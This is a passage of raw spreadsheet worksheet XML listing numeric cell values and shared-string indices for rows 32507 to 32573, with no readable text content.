        <v>1212.0</v>
      </c>
      <c r="B32507" s="2">
        <v>2.486137E7</v>
      </c>
      <c r="C32507" s="2" t="s">
        <v>31281</v>
      </c>
      <c r="D32507" s="2">
        <v>1.0</v>
      </c>
      <c r="E32507" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32507" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32508" ht="15.75" customHeight="1">
      <c r="A32508" s="1">
        <v>1768.0</v>
      </c>
      <c r="B32508" s="2">
        <v>2.9006325E7</v>
      </c>
      <c r="C32508" s="2" t="s">
        <v>31282</v>
      </c>
      <c r="D32508" s="2">
        <v>1.0</v>
      </c>
      <c r="E32508" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32508" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32509" ht="15.75" customHeight="1">
      <c r="A32509" s="1">
        <v>1783.0</v>
      </c>
      <c r="B32509" s="2">
        <v>2.9071681E7</v>
      </c>
      <c r="C32509" s="2" t="s">
        <v>31283</v>
      </c>
      <c r="D32509" s="2">
        <v>1.0</v>
      </c>
      <c r="E32509" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32509" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32510" ht="15.75" customHeight="1">
      <c r="A32510" s="1">
        <v>2079.0</v>
      </c>
      <c r="B32510" s="2">
        <v>3.116791E7</v>
      </c>
      <c r="C32510" s="2" t="s">
        <v>31284</v>
      </c>
      <c r="D32510" s="2">
        <v>1.0</v>
      </c>
      <c r="E32510" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32510" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32511" ht="15.75" customHeight="1">
      <c r="A32511" s="1">
        <v>2112.0</v>
      </c>
      <c r="B32511" s="2">
        <v>3.1363926E7</v>
      </c>
      <c r="C32511" s="2" t="s">
        <v>31285</v>
      </c>
      <c r="D32511" s="2">
        <v>1.0</v>
      </c>
      <c r="E32511" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32511" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32512" ht="15.75" customHeight="1">
      <c r="A32512" s="1">
        <v>2188.0</v>
      </c>
      <c r="B32512" s="2">
        <v>3.1896352E7</v>
      </c>
      <c r="C32512" s="2" t="s">
        <v>31286</v>
      </c>
      <c r="D32512" s="2">
        <v>1.0</v>
      </c>
      <c r="E32512" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32512" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32513" ht="15.75" customHeight="1">
      <c r="A32513" s="1">
        <v>2571.0</v>
      </c>
      <c r="B32513" s="2">
        <v>3.4243734E7</v>
      </c>
      <c r="C32513" s="2" t="s">
        <v>31287</v>
      </c>
      <c r="D32513" s="2">
        <v>1.0</v>
      </c>
      <c r="E32513" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32513" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32514" ht="15.75" customHeight="1">
      <c r="A32514" s="1">
        <v>2806.0</v>
      </c>
      <c r="B32514" s="2">
        <v>3.5347042E7</v>
      </c>
      <c r="C32514" s="2" t="s">
        <v>31288</v>
      </c>
      <c r="D32514" s="2">
        <v>1.0</v>
      </c>
      <c r="E32514" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32514" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32515" ht="15.75" customHeight="1">
      <c r="A32515" s="1">
        <v>3046.0</v>
      </c>
      <c r="B32515" s="2">
        <v>3.6502484E7</v>
      </c>
      <c r="C32515" s="2" t="s">
        <v>31289</v>
      </c>
      <c r="D32515" s="2">
        <v>1.0</v>
      </c>
      <c r="E32515" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32515" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32516" ht="15.75" customHeight="1">
      <c r="A32516" s="1">
        <v>3146.0</v>
      </c>
      <c r="B32516" s="2">
        <v>3.6969348E7</v>
      </c>
      <c r="C32516" s="2" t="s">
        <v>31290</v>
      </c>
      <c r="D32516" s="2">
        <v>1.0</v>
      </c>
      <c r="E32516" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32516" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32517" ht="15.75" customHeight="1">
      <c r="A32517" s="1">
        <v>3702.0</v>
      </c>
      <c r="B32517" s="2">
        <v>3.9565615E7</v>
      </c>
      <c r="C32517" s="2" t="s">
        <v>31291</v>
      </c>
      <c r="D32517" s="2">
        <v>1.0</v>
      </c>
      <c r="E32517" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32517" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32518" ht="15.75" customHeight="1">
      <c r="A32518" s="1">
        <v>3917.0</v>
      </c>
      <c r="B32518" s="2">
        <v>4.0552383E7</v>
      </c>
      <c r="C32518" s="2" t="s">
        <v>31292</v>
      </c>
      <c r="D32518" s="2">
        <v>1.0</v>
      </c>
      <c r="E32518" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32518" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32519" ht="15.75" customHeight="1">
      <c r="A32519" s="1">
        <v>4191.0</v>
      </c>
      <c r="B32519" s="2">
        <v>4.1577923E7</v>
      </c>
      <c r="C32519" s="2" t="s">
        <v>31293</v>
      </c>
      <c r="D32519" s="2">
        <v>1.0</v>
      </c>
      <c r="E32519" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32519" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32520" ht="15.75" customHeight="1">
      <c r="A32520" s="1">
        <v>4548.0</v>
      </c>
      <c r="B32520" s="2">
        <v>4.2683967E7</v>
      </c>
      <c r="C32520" s="2" t="s">
        <v>31294</v>
      </c>
      <c r="D32520" s="2">
        <v>1.0</v>
      </c>
      <c r="E32520" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32520" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32521" ht="15.75" customHeight="1">
      <c r="A32521" s="1">
        <v>4749.0</v>
      </c>
      <c r="B32521" s="2">
        <v>4.3385448E7</v>
      </c>
      <c r="C32521" s="2" t="s">
        <v>31295</v>
      </c>
      <c r="D32521" s="2">
        <v>1.0</v>
      </c>
      <c r="E32521" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32521" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32522" ht="15.75" customHeight="1">
      <c r="A32522" s="1">
        <v>4955.0</v>
      </c>
      <c r="B32522" s="2">
        <v>4.4055266E7</v>
      </c>
      <c r="C32522" s="2" t="s">
        <v>31296</v>
      </c>
      <c r="D32522" s="2">
        <v>1.0</v>
      </c>
      <c r="E32522" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32522" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32523" ht="15.75" customHeight="1">
      <c r="A32523" s="1">
        <v>4956.0</v>
      </c>
      <c r="B32523" s="2">
        <v>4.4059526E7</v>
      </c>
      <c r="C32523" s="2" t="s">
        <v>31297</v>
      </c>
      <c r="D32523" s="2">
        <v>1.0</v>
      </c>
      <c r="E32523" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32523" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32524" ht="15.75" customHeight="1">
      <c r="A32524" s="1">
        <v>7157.0</v>
      </c>
      <c r="B32524" s="2">
        <v>5.0484705E7</v>
      </c>
      <c r="C32524" s="2" t="s">
        <v>31298</v>
      </c>
      <c r="D32524" s="2">
        <v>1.0</v>
      </c>
      <c r="E32524" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32524" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32525" ht="15.75" customHeight="1">
      <c r="A32525" s="1">
        <v>7323.0</v>
      </c>
      <c r="B32525" s="2">
        <v>5.0893808E7</v>
      </c>
      <c r="C32525" s="2" t="s">
        <v>31299</v>
      </c>
      <c r="D32525" s="2">
        <v>1.0</v>
      </c>
      <c r="E32525" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32525" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32526" ht="15.75" customHeight="1">
      <c r="A32526" s="1">
        <v>8612.0</v>
      </c>
      <c r="B32526" s="2">
        <v>5.4267144E7</v>
      </c>
      <c r="C32526" s="2" t="s">
        <v>31300</v>
      </c>
      <c r="D32526" s="2">
        <v>1.0</v>
      </c>
      <c r="E32526" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32526" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32527" ht="15.75" customHeight="1">
      <c r="A32527" s="1">
        <v>8777.0</v>
      </c>
      <c r="B32527" s="2">
        <v>5.458593E7</v>
      </c>
      <c r="C32527" s="2" t="s">
        <v>31301</v>
      </c>
      <c r="D32527" s="2">
        <v>1.0</v>
      </c>
      <c r="E32527" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32527" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32528" ht="15.75" customHeight="1">
      <c r="A32528" s="1">
        <v>9099.0</v>
      </c>
      <c r="B32528" s="2">
        <v>5.515698E7</v>
      </c>
      <c r="C32528" s="2" t="s">
        <v>31302</v>
      </c>
      <c r="D32528" s="2">
        <v>1.0</v>
      </c>
      <c r="E32528" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32528" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32529" ht="15.75" customHeight="1">
      <c r="A32529" s="1">
        <v>9558.0</v>
      </c>
      <c r="B32529" s="2">
        <v>5.604206E7</v>
      </c>
      <c r="C32529" s="2" t="s">
        <v>31303</v>
      </c>
      <c r="D32529" s="2">
        <v>1.0</v>
      </c>
      <c r="E32529" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32529" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32530" ht="15.75" customHeight="1">
      <c r="A32530" s="1">
        <v>12020.0</v>
      </c>
      <c r="B32530" s="2">
        <v>2.6051383E7</v>
      </c>
      <c r="C32530" s="2" t="s">
        <v>31304</v>
      </c>
      <c r="D32530" s="2">
        <v>1.0</v>
      </c>
      <c r="E32530" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32530" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32531" ht="15.75" customHeight="1">
      <c r="A32531" s="1">
        <v>12053.0</v>
      </c>
      <c r="B32531" s="2">
        <v>2.6420861E7</v>
      </c>
      <c r="C32531" s="2" t="s">
        <v>31305</v>
      </c>
      <c r="D32531" s="2">
        <v>1.0</v>
      </c>
      <c r="E32531" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32531" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32532" ht="15.75" customHeight="1">
      <c r="A32532" s="1">
        <v>12193.0</v>
      </c>
      <c r="B32532" s="2">
        <v>2.7482052E7</v>
      </c>
      <c r="C32532" s="2" t="s">
        <v>31306</v>
      </c>
      <c r="D32532" s="2">
        <v>1.0</v>
      </c>
      <c r="E32532" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32532" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32533" ht="15.75" customHeight="1">
      <c r="A32533" s="1">
        <v>12542.0</v>
      </c>
      <c r="B32533" s="2">
        <v>2.9798344E7</v>
      </c>
      <c r="C32533" s="2" t="s">
        <v>31307</v>
      </c>
      <c r="D32533" s="2">
        <v>1.0</v>
      </c>
      <c r="E32533" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32533" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32534" ht="15.75" customHeight="1">
      <c r="A32534" s="1">
        <v>12765.0</v>
      </c>
      <c r="B32534" s="2">
        <v>3.122538E7</v>
      </c>
      <c r="C32534" s="2" t="s">
        <v>31308</v>
      </c>
      <c r="D32534" s="2">
        <v>1.0</v>
      </c>
      <c r="E32534" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32534" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32535" ht="15.75" customHeight="1">
      <c r="A32535" s="1">
        <v>12799.0</v>
      </c>
      <c r="B32535" s="2">
        <v>3.1415314E7</v>
      </c>
      <c r="C32535" s="2" t="s">
        <v>31309</v>
      </c>
      <c r="D32535" s="2">
        <v>1.0</v>
      </c>
      <c r="E32535" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32535" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32536" ht="15.75" customHeight="1">
      <c r="A32536" s="1">
        <v>13018.0</v>
      </c>
      <c r="B32536" s="2">
        <v>3.2936999E7</v>
      </c>
      <c r="C32536" s="2" t="s">
        <v>31310</v>
      </c>
      <c r="D32536" s="2">
        <v>1.0</v>
      </c>
      <c r="E32536" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32536" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32537" ht="15.75" customHeight="1">
      <c r="A32537" s="1">
        <v>13070.0</v>
      </c>
      <c r="B32537" s="2">
        <v>3.3327487E7</v>
      </c>
      <c r="C32537" s="5" t="s">
        <v>31311</v>
      </c>
      <c r="D32537" s="2">
        <v>1.0</v>
      </c>
      <c r="E32537" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32537" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32538" ht="15.75" customHeight="1">
      <c r="A32538" s="1">
        <v>13105.0</v>
      </c>
      <c r="B32538" s="2">
        <v>3.3532359E7</v>
      </c>
      <c r="C32538" s="2" t="s">
        <v>31312</v>
      </c>
      <c r="D32538" s="2">
        <v>1.0</v>
      </c>
      <c r="E32538" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32538" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32539" ht="15.75" customHeight="1">
      <c r="A32539" s="1">
        <v>13463.0</v>
      </c>
      <c r="B32539" s="2">
        <v>3.5201419E7</v>
      </c>
      <c r="C32539" s="2" t="s">
        <v>31313</v>
      </c>
      <c r="D32539" s="2">
        <v>1.0</v>
      </c>
      <c r="E32539" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32539" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32540" ht="15.75" customHeight="1">
      <c r="A32540" s="1">
        <v>13483.0</v>
      </c>
      <c r="B32540" s="2">
        <v>3.5334813E7</v>
      </c>
      <c r="C32540" s="2" t="s">
        <v>31314</v>
      </c>
      <c r="D32540" s="2">
        <v>1.0</v>
      </c>
      <c r="E32540" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32540" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32541" ht="15.75" customHeight="1">
      <c r="A32541" s="1">
        <v>13505.0</v>
      </c>
      <c r="B32541" s="2">
        <v>3.5440179E7</v>
      </c>
      <c r="C32541" s="2" t="s">
        <v>31315</v>
      </c>
      <c r="D32541" s="2">
        <v>1.0</v>
      </c>
      <c r="E32541" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32541" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32542" ht="15.75" customHeight="1">
      <c r="A32542" s="1">
        <v>14182.0</v>
      </c>
      <c r="B32542" s="2">
        <v>3.8102716E7</v>
      </c>
      <c r="C32542" s="2" t="s">
        <v>31316</v>
      </c>
      <c r="D32542" s="2">
        <v>1.0</v>
      </c>
      <c r="E32542" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32542" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32543" ht="15.75" customHeight="1">
      <c r="A32543" s="1">
        <v>14491.0</v>
      </c>
      <c r="B32543" s="2">
        <v>3.9626189E7</v>
      </c>
      <c r="C32543" s="2" t="s">
        <v>31317</v>
      </c>
      <c r="D32543" s="2">
        <v>1.0</v>
      </c>
      <c r="E32543" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32543" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32544" ht="15.75" customHeight="1">
      <c r="A32544" s="1">
        <v>14733.0</v>
      </c>
      <c r="B32544" s="2">
        <v>4.0685179E7</v>
      </c>
      <c r="C32544" s="2" t="s">
        <v>31318</v>
      </c>
      <c r="D32544" s="2">
        <v>1.0</v>
      </c>
      <c r="E32544" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32544" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32545" ht="15.75" customHeight="1">
      <c r="A32545" s="1">
        <v>15146.0</v>
      </c>
      <c r="B32545" s="2">
        <v>4.1948644E7</v>
      </c>
      <c r="C32545" s="2" t="s">
        <v>31319</v>
      </c>
      <c r="D32545" s="2">
        <v>1.0</v>
      </c>
      <c r="E32545" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32545" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32546" ht="15.75" customHeight="1">
      <c r="A32546" s="1">
        <v>15338.0</v>
      </c>
      <c r="B32546" s="2">
        <v>4.2601E7</v>
      </c>
      <c r="C32546" s="2" t="s">
        <v>31320</v>
      </c>
      <c r="D32546" s="2">
        <v>1.0</v>
      </c>
      <c r="E32546" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32546" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32547" ht="15.75" customHeight="1">
      <c r="A32547" s="1">
        <v>15684.0</v>
      </c>
      <c r="B32547" s="2">
        <v>4.3849718E7</v>
      </c>
      <c r="C32547" s="2" t="s">
        <v>31321</v>
      </c>
      <c r="D32547" s="2">
        <v>1.0</v>
      </c>
      <c r="E32547" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32547" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32548" ht="15.75" customHeight="1">
      <c r="A32548" s="1">
        <v>15728.0</v>
      </c>
      <c r="B32548" s="2">
        <v>4.4045907E7</v>
      </c>
      <c r="C32548" s="2" t="s">
        <v>31322</v>
      </c>
      <c r="D32548" s="2">
        <v>1.0</v>
      </c>
      <c r="E32548" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32548" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32549" ht="15.75" customHeight="1">
      <c r="A32549" s="1">
        <v>16204.0</v>
      </c>
      <c r="B32549" s="2">
        <v>4.5678364E7</v>
      </c>
      <c r="C32549" s="2" t="s">
        <v>31323</v>
      </c>
      <c r="D32549" s="2">
        <v>1.0</v>
      </c>
      <c r="E32549" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32549" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32550" ht="15.75" customHeight="1">
      <c r="A32550" s="1">
        <v>16401.0</v>
      </c>
      <c r="B32550" s="2">
        <v>4.6286123E7</v>
      </c>
      <c r="C32550" s="2" t="s">
        <v>31324</v>
      </c>
      <c r="D32550" s="2">
        <v>1.0</v>
      </c>
      <c r="E32550" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32550" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32551" ht="15.75" customHeight="1">
      <c r="A32551" s="1">
        <v>16419.0</v>
      </c>
      <c r="B32551" s="2">
        <v>4.6307112E7</v>
      </c>
      <c r="C32551" s="2" t="s">
        <v>31325</v>
      </c>
      <c r="D32551" s="2">
        <v>1.0</v>
      </c>
      <c r="E32551" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32551" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32552" ht="15.75" customHeight="1">
      <c r="A32552" s="1">
        <v>16578.0</v>
      </c>
      <c r="B32552" s="2">
        <v>4.6911533E7</v>
      </c>
      <c r="C32552" s="2" t="s">
        <v>31326</v>
      </c>
      <c r="D32552" s="2">
        <v>1.0</v>
      </c>
      <c r="E32552" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32552" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32553" ht="15.75" customHeight="1">
      <c r="A32553" s="1">
        <v>16655.0</v>
      </c>
      <c r="B32553" s="2">
        <v>4.7196019E7</v>
      </c>
      <c r="C32553" s="2" t="s">
        <v>31327</v>
      </c>
      <c r="D32553" s="2">
        <v>1.0</v>
      </c>
      <c r="E32553" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32553" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32554" ht="15.75" customHeight="1">
      <c r="A32554" s="1">
        <v>17579.0</v>
      </c>
      <c r="B32554" s="2">
        <v>5.0266539E7</v>
      </c>
      <c r="C32554" s="2" t="s">
        <v>31328</v>
      </c>
      <c r="D32554" s="2">
        <v>1.0</v>
      </c>
      <c r="E32554" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32554" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32555" ht="15.75" customHeight="1">
      <c r="A32555" s="1">
        <v>17983.0</v>
      </c>
      <c r="B32555" s="2">
        <v>5.1381785E7</v>
      </c>
      <c r="C32555" s="2" t="s">
        <v>31329</v>
      </c>
      <c r="D32555" s="2">
        <v>1.0</v>
      </c>
      <c r="E32555" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32555" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32556" ht="15.75" customHeight="1">
      <c r="A32556" s="1">
        <v>18694.0</v>
      </c>
      <c r="B32556" s="2">
        <v>5.3602175E7</v>
      </c>
      <c r="C32556" s="2" t="s">
        <v>31330</v>
      </c>
      <c r="D32556" s="2">
        <v>1.0</v>
      </c>
      <c r="E32556" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32556" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32557" ht="15.75" customHeight="1">
      <c r="A32557" s="1">
        <v>18887.0</v>
      </c>
      <c r="B32557" s="2">
        <v>5.4119375E7</v>
      </c>
      <c r="C32557" s="2" t="s">
        <v>31331</v>
      </c>
      <c r="D32557" s="2">
        <v>1.0</v>
      </c>
      <c r="E32557" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32557" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32558" ht="15.75" customHeight="1">
      <c r="A32558" s="1">
        <v>19003.0</v>
      </c>
      <c r="B32558" s="2">
        <v>5.4470324E7</v>
      </c>
      <c r="C32558" s="2" t="s">
        <v>31332</v>
      </c>
      <c r="D32558" s="2">
        <v>1.0</v>
      </c>
      <c r="E32558" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32558" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32559" ht="15.75" customHeight="1">
      <c r="A32559" s="1">
        <v>20008.0</v>
      </c>
      <c r="B32559" s="2">
        <v>5.7738276E7</v>
      </c>
      <c r="C32559" s="2" t="s">
        <v>31333</v>
      </c>
      <c r="D32559" s="2">
        <v>1.0</v>
      </c>
      <c r="E32559" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32559" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32560" ht="15.75" customHeight="1">
      <c r="A32560" s="1">
        <v>20046.0</v>
      </c>
      <c r="B32560" s="2">
        <v>7924628.0</v>
      </c>
      <c r="C32560" s="2" t="s">
        <v>31334</v>
      </c>
      <c r="D32560" s="2">
        <v>1.0</v>
      </c>
      <c r="E32560" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32560" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32561" ht="15.75" customHeight="1">
      <c r="A32561" s="1">
        <v>21254.0</v>
      </c>
      <c r="B32561" s="2">
        <v>2.0039786E7</v>
      </c>
      <c r="C32561" s="2" t="s">
        <v>31335</v>
      </c>
      <c r="D32561" s="2">
        <v>1.0</v>
      </c>
      <c r="E32561" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32561" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32562" ht="15.75" customHeight="1">
      <c r="A32562" s="1">
        <v>22288.0</v>
      </c>
      <c r="B32562" s="2">
        <v>3.3488231E7</v>
      </c>
      <c r="C32562" s="2" t="s">
        <v>31336</v>
      </c>
      <c r="D32562" s="2">
        <v>1.0</v>
      </c>
      <c r="E32562" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32562" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32563" ht="15.75" customHeight="1">
      <c r="A32563" s="1">
        <v>23080.0</v>
      </c>
      <c r="B32563" s="2">
        <v>5.0555032E7</v>
      </c>
      <c r="C32563" s="2" t="s">
        <v>31337</v>
      </c>
      <c r="D32563" s="2">
        <v>1.0</v>
      </c>
      <c r="E32563" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32563" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32564" ht="15.75" customHeight="1">
      <c r="A32564" s="1">
        <v>25286.0</v>
      </c>
      <c r="B32564" s="2">
        <v>1.3399403E7</v>
      </c>
      <c r="C32564" s="2" t="s">
        <v>31338</v>
      </c>
      <c r="D32564" s="2">
        <v>1.0</v>
      </c>
      <c r="E32564" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32564" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32565" ht="15.75" customHeight="1">
      <c r="A32565" s="1">
        <v>25412.0</v>
      </c>
      <c r="B32565" s="2">
        <v>1.3780659E7</v>
      </c>
      <c r="C32565" s="2" t="s">
        <v>31339</v>
      </c>
      <c r="D32565" s="2">
        <v>1.0</v>
      </c>
      <c r="E32565" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32565" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32566" ht="15.75" customHeight="1">
      <c r="A32566" s="1">
        <v>25584.0</v>
      </c>
      <c r="B32566" s="2">
        <v>1.4341177E7</v>
      </c>
      <c r="C32566" s="2" t="s">
        <v>31340</v>
      </c>
      <c r="D32566" s="2">
        <v>1.0</v>
      </c>
      <c r="E32566" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32566" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32567" ht="15.75" customHeight="1">
      <c r="A32567" s="1">
        <v>26054.0</v>
      </c>
      <c r="B32567" s="2">
        <v>1.5524904E7</v>
      </c>
      <c r="C32567" s="2" t="s">
        <v>31341</v>
      </c>
      <c r="D32567" s="2">
        <v>1.0</v>
      </c>
      <c r="E32567" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32567" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32568" ht="15.75" customHeight="1">
      <c r="A32568" s="1">
        <v>27696.0</v>
      </c>
      <c r="B32568" s="2">
        <v>2.3011771E7</v>
      </c>
      <c r="C32568" s="2" t="s">
        <v>31342</v>
      </c>
      <c r="D32568" s="2">
        <v>1.0</v>
      </c>
      <c r="E32568" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32568" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32569" ht="15.75" customHeight="1">
      <c r="A32569" s="1">
        <v>27856.0</v>
      </c>
      <c r="B32569" s="2">
        <v>2.3427988E7</v>
      </c>
      <c r="C32569" s="2" t="s">
        <v>31343</v>
      </c>
      <c r="D32569" s="2">
        <v>1.0</v>
      </c>
      <c r="E32569" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32569" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32570" ht="15.75" customHeight="1">
      <c r="A32570" s="1">
        <v>28861.0</v>
      </c>
      <c r="B32570" s="2">
        <v>2.9059744E7</v>
      </c>
      <c r="C32570" s="2" t="s">
        <v>4778</v>
      </c>
      <c r="D32570" s="2">
        <v>1.0</v>
      </c>
      <c r="E32570" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32570" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32571" ht="15.75" customHeight="1">
      <c r="A32571" s="1">
        <v>30197.0</v>
      </c>
      <c r="B32571" s="2">
        <v>3.7267842E7</v>
      </c>
      <c r="C32571" s="2" t="s">
        <v>31344</v>
      </c>
      <c r="D32571" s="2">
        <v>1.0</v>
      </c>
      <c r="E32571" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32571" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32572" ht="15.75" customHeight="1">
      <c r="A32572" s="1">
        <v>30417.0</v>
      </c>
      <c r="B32572" s="2">
        <v>3.882757E7</v>
      </c>
      <c r="C32572" s="2" t="s">
        <v>31345</v>
      </c>
      <c r="D32572" s="2">
        <v>1.0</v>
      </c>
      <c r="E32572" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32572" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32573" ht="15.75" customHeight="1">
      <c r="A32573" s="1">
        <v>30442.0</v>
      </c>
      <c r="B32573" s="2">
        <v>3.9198904E7</v>
      </c>
      <c r="C32573" s="2" t="s">
        <v>31346</v>
      </c>
      <c r="D32573" s="2">
        <v>1.0</v>
      </c>
      <c r="E32573" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32573" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32574" ht="15.75" customHeight="1">
      <c r="A32574" s="1">
